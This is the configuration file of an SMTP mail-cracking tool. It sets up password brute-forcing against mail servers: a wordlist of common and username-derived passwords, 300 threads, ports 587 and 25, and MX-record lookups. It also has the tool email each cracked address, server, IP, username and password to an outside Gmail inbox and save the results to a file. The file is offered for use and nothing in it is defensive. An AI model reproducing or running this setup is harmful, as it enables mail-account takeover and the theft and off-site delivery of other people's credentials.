[Sanmao SMTP Mail Cracker]
PassList=#user##newline##User##newline##USER##newline##user#123#newline##user#888#newline##User#123#newline##User#888#newline##domaincenter##newline##Domaincenter##newline##DOMAINCENTER##newline##domaincenter#123#newline##domaincenter#888#newline#password#newline#P@ssw0rd#newline#123456#newline#654321#newline#12345678#newline#qwerty#newline#asdfgh#newline#letmein#newline#abc123#newline#abc123456#newline#000000#newline#123123#newline#666666#newline#777777#newline#888888#newline#999999#newline#696969#newline#admin#newline#master#newline#love#newline#iloveu#newline#iloveyou#newline#superman#newline#batman#newline#fuckme#newline#fuckyou#newline#sunshine#newline#asshole#newline#trustno1#newline#secret#newline#cowboy#newline#cheese#newline#princess#newline#123mudar#newline#mudar123#newline#mudar
ThreadCount=300
ServerTopDomain=1
ServerMail=1
ServerSmtp=1
IsSendTestMail=1
TestMailBox=bumba20k18@gmail.com
UserIsBeforeAt=1
UserIsFullMail=1
IsSaveResultToFile=1
ChkServerWebMain=1
TestMailSubject=Box >>))).>
TestMailContent=Email: #mail##newline#Server: #server##newline#IP: #serverip##newline#SSL/TLS: #ssl##newline#User: #user##newline#Pass: #pass##newline#
MxRecordOfDomain=1
PortToConnect=587,25
ResultFormat=EMail:#mail#	SMTP Server:#server#	IP:#serverip#	Port:#port#	SSL/TLS:#ssl#	Username:#user#	Password:#pass#
ExtraServer=
FetchResultIPCity=1
